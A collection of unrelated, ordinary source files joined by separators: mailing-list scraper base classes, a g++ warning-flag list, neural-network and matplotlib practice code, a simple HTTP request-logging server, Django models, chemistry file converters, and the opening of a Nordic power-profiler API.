(using the to_*() methods) that can be saved on the local memory.
"""
def __init__(
self,
website=False,
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[requests.Session] = None,
):
if website:
if (session is None) and (url_login is not None):
session = get_auth_session(url_login, **login)
session = set_website_preference_for_header(url_pref, session)
self.session = session
def create_email_message(
self,
archived_at: str,
body: str,
**header,
) -> Message:
"""
Parameters
----------
archived_at : URL to the Email message.
body : String that contains the body of the message.
header : Dictionary that contains all available header fields of the
message.
"""
msg = email.message.EmailMessage()
if body is not None:
try:
msg.set_content(body) # don't use charset="utf-16"
except Exception:
# UnicodeEncodeError: 'utf-16' codec can't encode character
# '\ud83d' in position 8638: surrogates not allowed
pass
for key, value in header.items():
if "content-type" == key:
msg.set_param("Content-Type", value)
elif "mime-version" == key:
msg.set_param("MIME-Version", value)
elif "content-transfer-encoding" == key:
msg.set_param("Content-Transfer-Encoding", value)
else:
try:
# TODO: find out why it sometimes raises
# email/_header_value_parser.py
# IndexError: list index out of range.
# Also look into UTF-8 encoding.
msg[key] = value
except Exception:
pass
if (
(msg["Message-ID"] is None)
and (msg["Date"] is not None)
and (msg["From"] is not None)
):
msg["Message-ID"] = archived_at.split("/")[-1]
# convert to `EmailMessage` to `mboxMessage`
mbox_msg = mboxMessage(msg)
mbox_msg.add_header("Archived-At", "<" + archived_at + ">")
return mbox_msg
def from_url(
self,
list_name: str,
url: str,
fields: str = "total",
) -> Message:
"""
Parameters
----------
list_name : The name of the mailing list.
url : URL of this Email
fields : Indicates whether to return 'header', 'body' or 'total'/both or
the Email. The latter is the default.
"""
soup = get_website_content(url, session=self.session)
if soup == "RequestException":
body = "RequestException"
header = self.empty_header
else:
if fields in ["header", "total"]:
header = self._get_header_from_html(soup)
else:
header = self.empty_header
if fields in ["body", "total"]:
body = self._get_body_from_html(list_name, url, soup)
else:
body = None
return self.create_email_message(url, body, **header)
@abstractmethod
def _get_header_from_html(self, soup: BeautifulSoup) -> Dict[str, str]:
pass
@abstractmethod
def _get_body_from_html(
self, list_name: str, url: str, soup: BeautifulSoup
) -> Union[str, None]:
pass
@staticmethod
def to_dict(msg: Message) -> Dict[str, List[str]]:
"""Convert mboxMessage to a Dictionary"""
return bio.email_to_dict(msg)
@staticmethod
def to_pandas_dataframe(msg: Message) -> pd.DataFrame:
"""Convert mboxMessage to a pandas.DataFrame"""
return bio.email_to_pandas_dataframe(msg)
@staticmethod
def to_mbox(msg: Message, filepath: str):
"""
Parameters
----------
msg : The Email.
filepath : Path to file in which the Email will be stored.
"""
return bio.email_to_mbox(msg, filepath)
class AbstractMailList(ABC):
"""
This class handles the scraping of a all public Emails contained in a single
mailing list. To be more precise, each contributor to a mailing list sends
their message to an Email address that has the following structure:
<mailing_list_name>@<mail_list_domain_name>.
Thus, this class contains all Emails send to a specific <mailing_list_name>
(the Email localpart).
Parameters
----------
name : The of whom the list (e.g. 3GPP_COMMON_IMS_XFER, IEEESCO-DIFUSION, ...)
source : Contains the information of the location of the mailing list.
It can be either an URL where the list or a path to the file(s).
msgs : List of mboxMessage objects
Methods
-------
from_url()
from_messages()
from_mbox()
get_message_urls()
get_messages_from_url()
get_index_of_elements_in_selection()
get_name_from_url()
to_dict()
to_pandas_dataframe()
to_mbox()
"""
def __init__(
self,
name: str,
source: Union[List[str], str],
msgs: MailList,
):
self.name = name
self.source = source
self.messages = msgs
def __len__(self) -> int:
"""Get number of messsages within the mailing list."""
return len(self.messages)
def __iter__(self):
"""Iterate over each message within the mailing list."""
return iter(self.messages)
def __getitem__(self, index) -> Message:
"""Get specific message at position `index` within the mailing list."""
return self.messages[index]
@classmethod
@abstractmethod
def from_url(
cls,
name: str,
url: str,
select: Optional[dict] = {"fields": "total"},
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[requests.Session] = None,
) -> "AbstractMailList":
"""
Parameters
----------
name : Name of the mailing list.
url : URL to the mailing list.
select : Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year, month, week-of-month
url_login : URL to the 'Log In' page
url_pref : URL to the 'Preferences'/settings page
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the Email list domain website.
"""
pass
@classmethod
@abstractmethod
def from_messages(
cls,
name: str,
url: str,
messages: Union[List[str], MailList],
fields: str = "total",
url_login: str = None,
url_pref: str = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[str] = None,
) -> "AbstractMailList":
"""
Parameters
----------
name : Name of the list of messages, e.g. 'public-bigdata'
url : URL to the Email list.
messages : Can either be a list of URLs to specific messages
or a list of `mboxMessage` objects.
url_login : URL to the 'Log In' page.
url_pref : URL to the 'Preferences'/settings page.
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the Email list domain website.
"""
pass
@classmethod
@abstractmethod
def from_mbox(cls, name: str, filepath: str) -> "AbstractMailList":
"""
Parameters
----------
name : Name of the list of messages, e.g. '3GPP_TSG_SA_WG2_UPCON'.
filepath : Path to file in which mailing list is stored.
"""
pass
@classmethod
@abstractmethod
def get_message_urls(
cls,
name: str,
url: str,
select: Optional[dict] = None,
) -> List[str]:
"""
Parameters
----------
name : Name of the list of messages, e.g. 'public-bigdata'
url : URL to the mailing list.
select : Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year and month
Returns
-------
List of all selected URLs of the messages in the mailing list.
"""
pass
@staticmethod
def get_messages_from_urls(
name: str,
msg_urls: list,
msg_parser,
fields: Optional[str] = "total",
) -> MailList:
"""
Generator that returns all messages within a certain period
(e.g. January 2021, Week 5).
Parameters
----------
name : Name of the list of messages, e.g. '3GPP_TSG_SA_WG2_UPCON'
url : URL to the mailing list.
fields : Content, i.e. header and/or body
"""
# get all message contents
msgs = []
for msg_url in tqdm(msg_urls, ascii=True, desc=name):
msg = msg_parser.from_url(
list_name=name,
url=msg_url,
fields=fields,
)
if msg.get_payload() == "RequestException":
time.sleep(30)
else:
msgs.append(msg)
logger.info(f"Recorded the message {msg_url}.")
# wait between loading messages, for politeness
time.sleep(1)
return msgs
@staticmethod
def get_index_of_elements_in_selection(
times: List[Union[int, str]],
urls: List[str],
filtr: Union[tuple, list, int, str],
) -> List[int]:
"""
Filter out messages that where in a specific period. Period here is a set
containing units of year, month, and week-of-month which can have the following
example elements:
- years: (1992, 2010), [2000, 2008], 2021
- months: ["January", "July"], "November"
- weeks: (1, 4), [1, 5], 2
Parameters
----------
times : A list containing information of the period for each
group of mboxMessage.
urls : Corresponding URLs of each group of mboxMessage of which the
period info is contained in `times`.
filtr : Containing info on what should be filtered.
Returns
-------
Indices of to the elements in `times`/`ursl`.
"""
if isinstance(filtr, tuple):
# filter year or week in range
cond = lambda x: (np.min(filtr) <= x <= np.max(filtr))
if isinstance(filtr, list):
# filter in year, week, or month in list
cond = lambda x: x in filtr
if isinstance(filtr, int):
# filter specific year or week
cond = lambda x: x == filtr
if isinstance(filtr, str):
# filter specific month
cond = lambda x: x == filtr
return [idx for idx, time in enumerate(times) if cond(time)]
@abstractmethod
def get_name_from_url(url: str) -> str:
pass
def to_dict(self, include_body: bool = True) -> Dict[str, List[str]]:
"""
Parameters
----------
include_body : A boolean that indicates whether the message body should
be included or not.
Returns
-------
A Dictionary with the first key layer being the header field names and
the "body" key. Each value field is a list containing the respective
header field contents arranged by the order as they were scraped from
the web. This format makes the conversion to a pandas.DataFrame easier.
"""
return bio.mlist_to_dict(self.messages, include_body)
def to_pandas_dataframe(self, include_body: bool = True) -> pd.DataFrame:
"""
Parameters
----------
include_body : A boolean that indicates whether the message body should
be included or not.
Returns
-------
Converts the mailing list into a pandas.DataFrame object in which each
row represents an Email.
"""
return bio.mlist_to_pandas_dataframe(self.messages, include_body)
def to_mbox(self, dir_out: str, filename: Optional[str] = None):
"""Safe mailing list to .mbox files."""
if filename is None:
bio.mlist_to_mbox(self.messages, dir_out, self.name)
else:
bio.mlist_to_mbox(self.messages, dir_out, filename)
class AbstractMailListDomain(ABC):
"""
This class handles the scraping of a all public Emails contained in a mail
list domain. To be more precise, each contributor to a mailing archive sends
their message to an Email address that has the following structure:
<mailing_list_name>@<mail_list_domain_name>.
Thus, this class contains all Emails send to <mail_list_domain_name>
(the Email domain name). These Emails are contained in a list of
`AbstractMailList` types, such that it is known to which <mailing_list_name>
(the Email localpart) was send.
Parameters
----------
name : The mail list domain name (e.g. 3GPP, IEEE, W3C)
url : The URL where the archive lives
lists : A list containing the mailing lists as `AbstractMailList` types
Methods
-------
from_url()
from_mailing_lists()
from_mbox()
get_lists_from_url()
to_dict()
to_pandas_dataframe()
to_mbox()
"""
def __init__(
self, name: str, url: str, lists: List[Union[AbstractMailList, str]]
):
self.name = name
self.url = url
self.lists = lists
def __len__(self):
"""Get number of mailing lists within the mail list domain."""
return len(self.lists)
def __iter__(self):
"""Iterate over each mailing list within the mail list domain."""
return iter(self.lists)
def __getitem__(self, index):
"""Get specific mailing list at position `index` from the mail list domain."""
return self.lists[index]
@classmethod
@abstractmethod
def from_url(
cls,
name: str,
url_root: str,
url_home: Optional[str] = None,
select: Optional[dict] = None,
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[str] = None,
instant_save: bool = True,
only_mlist_urls: bool = True,
) -> "AbstractMailListDomain":
"""
Create a mail list domain from a given URL.
Parameters
----------
name : Email list domain name, such that multiple instances of
`AbstractMailListDomain` can easily be distinguished.
url_root : The invariant root URL that does not change no matter what
part of the mail list domain we access.
url_home : The 'home' space of the mail list domain. This is required as
it contains the different sections which we obtain using `get_sections()`.
select: Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year, month, week-of-month
url_login : URL to the 'Log In' page.
url_pref : URL to the 'Preferences'/settings page.
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the mail list domain website.
instant_save : Boolean giving the choice to save a `AbstractMailList` as
soon as it is completely scraped or collect entire mail list domain. The
prior is recommended if a large number of mailing lists are
scraped which can require a lot of memory and time.
only_list_urls : Boolean giving the choice to collect only `AbstractMailList`
URLs or also their contents.
"""
pass
@classmethod
@abstractmethod
def from_mailing_lists(
cls,
name: str,
url_root: str,
url_mailing_lists: Union[List[str], List[AbstractMailList]],
select: Optional[dict] = None,
url_login: Optional[str] = None,
url_pref: Optional[str] = None,
login: Optional[Dict[str, str]] = {"username": None, "password": None},
session: Optional[str] = None,
only_mlist_urls: bool = True,
instant_save: Optional[bool] = True,
) -> "AbstractMailListDomain":
"""
Create mailing mail list domain from a given list of 'AbstractMailList` instances or URLs
pointing to mailing lists.
Parameters
----------
name : mail list domain name, such that multiple instances of
`AbstractMailListDomain` can easily be distinguished.
url_root : The invariant root URL that does not change no matter what
part of the mail list domain we access.
url_mailing_lists : This argument can either be a list of `AbstractMailList`
objects or a list of string containing the URLs to the mailing
list of interest.
url_login : URL to the 'Log In' page.
url_pref : URL to the 'Preferences'/settings page.
login : Login credentials (username and password) that were used to set
up AuthSession.
session : requests.Session() object for the mail list domain website.
only_list_urls : Boolean giving the choice to collect only mailing list
URLs or also their contents.
instant_save : Boolean giving the choice to save a `AbstractMailList` as
soon as it is completely scraped or collect entire mail list domain. The
prior is recommended if a large number of mailing lists are
scraped which can require a lot of memory and time.
"""
pass
@classmethod
@abstractmethod
def from_mbox(
cls,
name: str,
directorypath: str,
filedsc: str = "*.mbox",
) -> "AbstractMailListDomain":
"""
Parameters
----------
name : mail list domain name, such that multiple instances of
`AbstractMailListDomain` can easily be distinguished.
directorypath : Path to the folder in which `AbstractMailListDomain` is stored.
filedsc : Optional filter that only reads files matching the description.
By default all files with an mbox extension are read.
"""
pass
@classmethod
@abstractmethod
def get_lists_from_url(
url_root: str,
url_home: str,
select: dict,
session: Optional[str] = None,
instant_save: bool = True,
only_mlist_urls: bool = True,
) -> List[Union[AbstractMailList, str]]:
"""
Created dictionary of all lists in the mail list domain.
Parameters
----------
url_root : The invariant root URL that does not change no matter what
part of the mail list domain we access.
url_home : The 'home' space of the mail list domain. This is required as
it contains the different sections which we obtain using `get_sections()`.
select : Selection criteria that can filter messages by:
- content, i.e. header and/or body
- period, i.e. written in a certain year, month, week-of-month
session : requests.Session() object for the mail list domain website.
instant_save : Boolean giving the choice to save a `AbstractMailList` as
soon as it is completely scraped or collect entire mail list domain. The
prior is recommended if a large number of mailing lists are
scraped which can require a lot of memory and time.
only_list_urls : Boolean giving the choice to collect only `AbstractMailList`
URLs or also their contents.
Returns
-------
archive_dict : the keys are the names of the lists and the value their url
"""
pass
def to_dict(self, include_body: bool = True) -> Dict[str, List[str]]:
"""
Concatenates mailing list dictionaries created using
`AbstractMailList.to_dict()`.
"""
return bio.mlistdom_to_dict(self.lists, include_body)
def to_pandas_dataframe(self, include_body: bool = True) -> pd.DataFrame:
"""
Concatenates mailing list pandas.DataFrames created using
`AbstractMailList.to_pandas_dataframe()`.
"""
return bio.mlistdom_to_pandas_dataframe(self.lists, include_body)
def to_mbox(self, dir_out: str):
"""
Save mail list domain content to .mbox files
"""
bio.mlistdom_to_mbox(self.lists, dir_out + "/" + self.name)
|
# The following g++ options are those that are not enabled by
#
# -Wall -Wextra -Werror -Weffc++
#
# The above options are recommended to be in SContruct/Makefile, and the options
# below are enabled as much as practical. If a particular option causes
# false-positives in one or a few files, then the issue can be resolved by
# including "gcc_util.h" and surrounding the offending code by
# DISABLE_WARNING(abc) and ENABLE_WARNING(abc) where 'abc' is the name of the
# compiler option without leading '-W'.
#
# Feel free too add comments, per option, as 2nd, 3rd etc. item, or on a line
# above.
#
# NOTE 1: the set of options below is a complete set that complements the above
# options. Therefore, if a option is determined to be not useful, keep it in this
# file commented or add 'no-' after -W, but do not remove it. This way we
# maintain completeness and later might enable those that are commented. Removal
# of them would essentially hide them from future use.
#
# NOTE 2: Some very useful options are available for g++ ver 10 but not for g++
# ver 7; these are commented out and marked with 'N/A'. You can try using a
# newer compiler just for diagnostic purposes, and use the old one for
# building.
#
# Enjoy your clean code!
#
compiler_warnings = [
"-Wall",
"-Wextra",
"-Werror",
#"-Waggregate-return", # not very useful
"-Waligned-new=all",
"-Walloc-zero",
"-Walloca",
#"-Wanalyzer-too-complex", # N/A
#"-Warith-conversion", # N/A
"-Warray-bounds=2",
#"-Wattribute-alias=2", # N/A
"-Wcast-align", # using =strict generates too many warnings
"-Wcast-qual",
#"-Wcatch-value=3", # N/A
#"-Wclass-conversion", # N/A
#"-Wclass-memaccess", # N/A
#"-Wcomma-subscript", # N/A
"-Wcomment",
"-Wconditionally-supported",
#"-Wconversion", # too many cases: {,u}int{32,64}_t are commingled
"-Wconversion-null",
"-Wctor-dtor-privacy",
"-Wno-dangling-else", # too many cases, therefore disabled
"-Wdate-time",
"-Wdelete-incomplete",
"-Wdelete-non-virtual-dtor",
#"-Wdeprecated-copy", # N/A
#"-Wdeprecated-copy-dtor", # N/A
"-Wdisabled-optimization",
#"-Wdouble-promotion", # FOR NOW
#"-Wduplicated-branches", # Useful, but g++ v 7 can give obscure messages
"-Wduplicated-cond",
"-Weffc++",
#"-Wextra-semi", # N/A
#"-Wfloat-conversion", # too many, disable FOR NOW
#"-Wfloat-equal", # there are 3 cases, marked with 'FIXME'.
# Need 'fabs(x-y)<eps' instead
"-Wformat-nonliteral",
"-Wformat-overflow=2",
"-Wformat-security",
"-Wformat-signedness",
"-Wformat-truncation=2",
"-Wformat=2", # if too noisy, use '=1'
"-Wimplicit-fallthrough=5", # use during dev to find issues.
# Otherwise fix some auto-genrated code
#"-Winaccessible-base", # N/A
"-Winherited-variadic-ctor",
#"-Winit-list-lifetime", # N/A
"-Winit-self",
#"-Winline", # g++ v 7: many false-positives, g++ v 10: OK
"-Winvalid-offsetof",
"-Winvalid-pch",
#"-Wlogical-op", # Useful, but buggy in g++ v 7.
#"-Wmismatched-tags", # N/A
"-Wmissing-declarations",
"-Wmissing-format-attribute",
"-Wmissing-include-dirs",
"-Wmultichar",
#"-Wmultiple-inheritance", # useful to search, not needed in this lib
#"-Wmultiple-inheritance", # useful to search, not needed in this lib
#"-Wnamespaces", # useful to search, not needed in this lib
#"-Wnoexcept", # too many, FOR NOW
"-Wnoexcept-type",
"-Wnon-template-friend",
"-Wnon-virtual-dtor",
"-Wnormalized",
"-Wnormalized=nfkc",
#"-Wnull-dereference", # g++ v 10: OK; g++ v 7: false-positives
"-Wold-style-cast", # too many, need a separe PR to do static_cast<>
"-Woverlength-strings",
"-Woverloaded-virtual",
"-Wpacked",
#"-Wpadded", # useful info when designing packed structs.
# Turn off during dev
#"-Wpedantic # of academic interest
#"-Wpessimizing-move # N/A
"-Wplacement-new=2",
"-Wpmf-conversions",
"-Wpointer-arith",
"-Wredundant-decls", # there a few in generated code,
# so can't edit easily
#"-Wredundant-move", # N/A
#"-Wredundant-tags", # too many of these,
# especially 'struct tm tm;'
"-Wregister",
"-Wreorder",
"-Wscalar-storage-order",
"-Wshadow",
"-Wshift-overflow=2",
#"-Wsign-conversion", # too many of these
#"-Wsign-promo", # too many FOR NOW
"-Wsized-deallocation",
#"-Wstack-protector", # useful for dev, but can gen fales-pos
"-Wstrict-aliasing=3",
"-Wstrict-null-sentinel",
"-Wno-strict-overflow", # g++ v 10 : the =5 gives false-positives,
# using =4; g++ v 7: using disabling
"-Wstringop-overflow=4",
"-Wsubobject-linkage",
#"-Wsuggest-attribute=cold", # N/A
#"-Wsuggest-attribute=const", # g++ v 7: incorrect diag; g++ v 10 OK
"-Wsuggest-attribute=format",
#"-Wsuggest-attribute=malloc", # N/A
# This following option suggested to mark as '[[ noreturn ]]'
# a template member function", that always throws.
# Did this, and found the folowing: when a template",
# specialization for the above template function does
# not throw unconditionally,", it seems the specialization did not return.
# I.e. the compiler did not provide", for the return.
# So be careful when using this with templates.
# A non-template", functions marked '[[ noreturn ]]' work as expectd.
#"-Wsuggest-attribute=noreturn", # useful. Turn on to search for no-return functions.
#"-Wmissing-noreturn", # useful. Turn on to search for no-return functions.
#"-Wsuggest-attribute=pure", # too many (about 100) suggestions
#"-Wsuggest-final-methods", # useful in g++ v 10;
# some false-positives in g++ v 7
#"-Wsuggest-final-types", # some false-positives; useful to enable
# temporarily
"-Wsuggest-override",
#"-Wswitch-default", # useful to for checking, but there is
# generated code that is hard to fix
"-Wswitch-enum",
"-Wsynth",
#"-Wsystem-headers", # of academic interest
#"-Wtemplates", # useful to find template decl in user code
"-Wterminate",
"-Wtrampolines",
"-Wundef",
"-Wunreachable-code",
#"-Wunsafe-loop-optimizations", # g++ v 7: false-positive, g++ v 10: OK.
"-Wunused",
"-Wunused-const-variable=1", # choice =2 complains about unused in the
# same translation unit
"-Wunused-macros",
"-Wuseless-cast",
"-Wvariadic-macros",
"-Wvector-operation-performance",
"-Wvirtual-inheritance",
"-Wvirtual-move-assign",
# "-Wvolatile", # N/A
"-Wwrite-strings",
#"-Wzero-as-null-pointer-constant", # g++ ver 7 treats NULL as zero int,
# it seems, usefule in g++ ver 10
]
|
## Testing matplotlib
## code from NNFS
## My own comments are marked with ##
## My own code start with ##-- and ends with --##
import random
import numpy as np
##--
from matplotlib import pyplot as plt, patches
# --##
from nnfs.datasets import spiral_data
dropout_rate = 0.5
# Example output containing 10 values
example_output = [0.27, -1.03, 0.67, 0.99, 0.05,
-0.37, -2.01, 1.13, -0.07, 0.73]
while True: # repeat as long as necessary
# Randomly choose index and set value to 0
index = random.randint(0, len(example_output) - 1)
example_output[index] = 0
# We might set an index that already is zeroed
# There are different ways of overcoming this problem,
# for simplicity we count values taht are exactly 0
# while it's extremely rare in real model that weights are exactly 0, this is not the best method for sure
dropped_out = 0
for value in example_output:
if value == 0:
dropped_out += 1
# If required number of outputs is zeroed - leave the loop
if dropped_out / len(example_output) >= dropout_rate:
break
# print(example_output)
##-- Testing Matplotlib
length= 1
width = 4
plt.rcParams["figure.figsize"] = [7, 5]
plt.rcParams["figure.autolayout"] = True
figure, ax = plt.subplots(1)
rectangle = [ x for x in range(7)]
for i in range(len(rectangle)):
if i%2 ==0:
rectangle[i] = patches.Rectangle((i, 1), 1, 1, edgecolor='orange', facecolor="red", linewidth=1)
else:
rectangle[i] = patches.Rectangle((i, 1), 1, 1, edgecolor='orange', facecolor="green", linewidth=0)
# rectangle[1] = patches.Rectangle((4, 4), 1, 1, edgecolor='orange',
# facecolor="green", linewidth=7)
# rectangle[0] = patches.Rectangle((1, 2), 1, 1, edgecolor='green', facecolor='orange', linewidth= 5)
ax.plot([2, 4, 5, 1, 4, 8, 0], c='red')
for point in rectangle:
ax.add_patch(point)
# print(np.log(0))
a = np.array([True, False, True])
# print(a)
b = a*1
# print(b)
# plt.show()
X, y = spiral_data(samples=100, classes=5)
# print(X, y)
for point, classes in zip(X,y):
pass
if classes==0:
plt.scatter(point[0],point[1], color='red')
if classes==1:
plt.scatter(point[0],point[1], color='blue')
if classes==2:
plt.scatter(point[0],point[1], color='green')
if classes==3:
plt.scatter(point[0],point[1], color='yellow')
if classes==4:
plt.scatter(point[0],point[1], color='purple')
# plt.show()
for x,y in zip([1,2,3,1,2,3,1,2,3],[1,1,1,2,2,2,3,3,3]):
plt.scatter(x,y,color = (x/3, y/3, 0))
# plt.show()
example = np.array([[1, 2], [3, 4]])
flattened = example.reshape(-1)
# print(example)
# print(example.shape)
# print(flattened)
# print(flattened.shape)
weights = np.random.randn(2, 4)
inputs = np.random.randn(6,2)
output = [[0 for x in range(len(weights[1]))] for x in range(len(inputs))]
for i_batch in range(len(output)): # Batch
for j_neuron in range(len(output[i_batch])): # Neuron
count = 0
for k_input in range(len(weights)):
count += weights[k_input][j_neuron]*inputs[i_batch][k_input]
output[i_batch][j_neuron] = count
print(output)
# --##
|
#!/usr/bin/env python3
"""
Very simple HTTP server in python for logging requests
Usage::
./server.py [ssl]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
import ssl
class ServerHandler(BaseHTTPRequestHandler):
def _set_response(self, code):
self.send_response(code)
self.send_header('Content-type', 'text/html')
self.end_headers()
response = '{"id": "0","text": "TestResponse"}'
self.wfile.write(bytes(response, 'utf-8'))
def do_GET(self):
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
self._set_response(200)
def do_POST(self):
content_length = int(self.headers['Content-Length'])
with open("written_data.txt", "a") as output_file:
post_data = self.rfile.read(content_length).decode('utf-8')
str_data = str(post_data + "\n")
output_file.write(str_data)
self._set_response(200)
def run(server_class=HTTPServer, handler_class=ServerHandler, port=4480, useSsl = False):
logging.basicConfig(level=logging.INFO)
server_address = ('0.0.0.0', port)
httpd = server_class(server_address, handler_class)
if (useSsl):
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./wasp.pem", server_side = True)
logging.info('Starting http server listening on port ' + str(port) + "\n")
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
logging.info('Stopping httpd...\n')
if __name__ == '__main__':
from sys import argv
if len(argv) == 2:
run(useSsl=(argv[1] == "ssl"))
else:
run()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from PySide2 import QtCore, QtWidgets
from {{cookiecutter.repo_name}}_ui import Ui_MainWindow
__version__ = "{{cookiecutter.version}}"
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
@QtCore.Slot()
def on_action_exit_triggered(self):
self.close()
@QtCore.Slot()
def on_action_about_triggered(self):
about_text = "<br>".join([f"<b>{{cookiecutter.repo_name}}</b> V{__version__}", "", "This is a PySide2 application."])
QtWidgets.QMessageBox.about(self, "About", about_text)
@QtCore.Slot()
def on_push_button_clicked(self):
self.ui.status_bar.showMessage("Popping up an informative message box...")
QtWidgets.QMessageBox.information(self, "Button clicked", "You clicked the button...")
self.ui.status_bar.clearMessage()
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
import os
from os import listdir
from os.path import isfile, join
import json
mypath = 'D:\data\smiles'
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f)) and f.startswith('SMILE_')]
counter_all = 0
file_counter = 0
FULL_URI_LIST = []
with open('FULL_URI_LIST', 'w') as f:
f.write('')
f.close()
for file in onlyfiles:
file_counter = file_counter + 1
print(file_counter, 'out of', len(onlyfiles))
with open(os.path.join(mypath, file)) as f:
obj = json.loads(f.read())
for item in obj:
counter_all = counter_all + 1
URI = item['species'] # get the uri
with open('FULL_URI_LIST', 'a') as f2:
f2.write(URI)
f2.write('\n')
f2.close()
f.close()
with open('FULL_URI_LIST',encoding='utf-8') as f:
FULL_URI_LIST = f.readlines()
FULL_URI_LIST = list(set(FULL_URI_LIST))
f.close()
with open('FULL_URI_LIST', 'w') as f:
f.write(json.dumps(FULL_URI_LIST, indent=4))
f.close()
|
# -*- coding: utf-8 -*-
from allink_core.core.models.managers import AllinkCategoryModelQuerySet
class PartnerQuerySet(AllinkCategoryModelQuerySet):
pass
PartnerManager = PartnerQuerySet.as_manager
|
#!/usr/bin/env python3
################################################################################
### cif2xyz file converter based on openbabel, script by RS ####################
################################################################################
import sys
import os
import subprocess
def float_w_braces(num):
num = num.split('(')[0]
return float(num)
name = sys.argv[1]
if len(sys.argv)>2:
outname = sys.argv[2]
else:
outname = name[:-4]+".txyz"
tempname = "temp.xyz"
try:
subprocess.call(["obabel", '-icif', name, '-oxyz', '-O'+tempname, '-UCfill', 'keepconnect'])
except OSError:
raise OSError("install openbabel - Chemical toolbox utilities (cli)")
# read cif to get cell params
f = open(name, "r")
line = f.readline()
cell = {}
while len(line)>0:
sline = line.split()
if len(sline)>1:
keyw = sline[0]
value = sline[1]
if keyw[:12] == "_cell_length":
cell[keyw[13]] = float_w_braces(value)
if keyw[:11] == "_cell_angle":
cell[keyw[12:]] = float_w_braces(value)
line = f.readline()
f.close()
cellparams = "%10.5f %10.5f %10.5f %10.5f %10.5f %10.5f" % (cell["a"], cell["b"], cell["c"], cell["alpha"], cell["beta"], cell["gamma"])
try:
subprocess.call(["x2x", "-i", tempname ,"-o", outname, "-c", cellparams])
except OSError:
raise OSError("get x2x from molsys repo")
finally:
os.remove(tempname)
|
from django.db import models
from school_backend.models.school import School
from django.core.exceptions import ValidationError
import uuid
from rest_framework import serializers, viewsets
## Refuse new students if the limit has been reached
def restrict_amount(value):
if Student.objects.filter(school=value).count() >= value.max_student_nb:
raise ValidationError(
'School already has maximal amount of students ' + str(value.max_student_nb))
class Student(models.Model):
first_name = models.CharField(max_length=20)
last_name = models.CharField(max_length=20)
student_identification = models.UUIDField(
default=uuid.uuid4, editable=False)
school = models.ForeignKey(
School, on_delete=models.CASCADE, validators=(restrict_amount, ))
# Serializers define the API representation.
class StudentSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Student
fields = ['first_name', 'last_name',
'student_identification', 'school']
# ViewSets define the view behavior.
## Retrieves all students if there is no param, else retrieve schools' students, if the school does not exist => error
class StudentViewSet(viewsets.ModelViewSet):
queryset = Student.objects.all().select_related('school')
serializer_class = StudentSerializer
def get_queryset(self, *args, **kwargs):
school_id = self.kwargs.get("school_pk")
if school_id is None :
return Student.objects.all()
try:
school = School.objects.get(id=school_id)
except School.DoesNotExist:
raise ValidationError('A school with this id does not exist')
return self.queryset.filter(school=school)
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import firebase
import utils
# Set-up logging
logger = utils.get_logger("lights.monitor")
def save_new_state(ext_id, new_state):
logger.info('Saving new state. ext_id: [%s], new_state: [%s]', ext_id, new_state)
doc_ref = firebase.get_lights().document(ext_id)
doc_ref.set({
firebase.F_STATUS: new_state,
firebase.F_LAST_UPDATE: time.time(),
})
logger.debug('Finished saving new state')
|
"""
Handles communication with Nordic Power Profiler Kit (PPK) hardware
using Segger's Real-Time Transfer functionality.
"""
import time
import struct
import re
import math
class PPKError(Exception):
"""PPK exception class, inherits from the built-in Exception class."""
def __init__(self, error=None):
"""Constructs a new object and sets the error."""
self.error = error
err_str = 'PPK error: {}'.format(self.error)
Exception.__init__(self, err_str)
class RTTCommand():
"""RTT command opcodes."""
TRIG_SET = 0x01
TRIG_WINDOW_SET = 0x03
TRIG_SINGLE_SET = 0x05
AVERAGE_START = 0x06
AVERAGE_STOP = 0x07
TRIG_STOP = 0x0A
DUT_TOGGLE = 0x0C
REGULATOR_SET = 0x0D
VREF_LO_SET = 0x0E
VREF_HI_SET = 0x0F
EXT_TRIG_IN_TOGGLE = 0x11
RES_USER_SET = 0x12
RES_USER_CLEAR = 0x13
SPIKE_FILTER_ON = 0x15
SPIKE_FILTER_OFF = 0x16
class API():
"""The PPK API takes care of rtt connection to the ppk, reading average
current consumption, starting and stopping etc.
"""
ADC_SAMPLING_TIME_US = 13
SAMPLES_PER_AVERAGE = 10
AVERAGE_TIME_US = (SAMPLES_PER_AVERAGE * ADC_SAMPLING_TIME_US)
TRIGGER_SAMPLES_PER_SECOND = (1e6 / ADC_SAMPLING_TIME_US)
AVERAGE_SAMPLES_PER_SECOND = (1e6 / AVERAGE_TIME_US)
EXT_REG_MIN_MV = 2100
EXT_REG_MAX_MV = 3600
TRIG_WINDOW_MIN_US = 1000
TRIG_WINDOW_MAX_US = 52000
RTT_CHANNEL_INDEX = 0
